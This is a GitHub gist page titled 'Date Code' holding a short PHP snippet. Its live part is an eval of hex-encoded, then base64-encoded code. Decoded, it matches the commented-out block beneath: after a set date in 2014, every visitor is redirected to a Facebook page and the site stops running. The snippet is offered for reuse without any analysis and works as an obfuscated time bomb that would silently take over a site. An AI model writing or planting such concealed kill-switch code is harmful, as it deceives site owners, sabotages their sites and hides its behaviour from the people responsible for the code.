Skip to content

Instantly share code, notes, and snippets.

@danimalweb
Created January 4, 2016 02:45
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save danimalweb/6483b13650ce5983babc to your computer and use it in GitHub Desktop.
Save danimalweb/6483b13650ce5983babc to your computer and use it in GitHub Desktop.
Date Code
<?php
eval(pack('H*','6576616C286261736536345F6465636F646528274A475268644756424944306764476C745A5367704F79414B4A47526864475643494430674A7A49774D5451744D5445744D4455674D4441364D44416E4F79414B6157596F4A475268644756424944346763335279644739306157316C4B43526B5958526C51696B706579414B494341674947686C5957526C636967695447396A5958527062323436494768306448427A4F693876643364334C6D5A6859325669623239724C6D4E766253395862334A735A484E435A584E3055335276636E6B2F5A6E4A6C5A6A3130637949704F776F67494341675A476C6C4F7770392729293B'));
?>
<?php
/*
$dateA = time();
$dateB = '2014-11-05 00:00';
if($dateA > strtotime($dateB)){
header("Location: https://www.facebook.com/WorldsBestStory?fref=ts");
die;
}*/
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment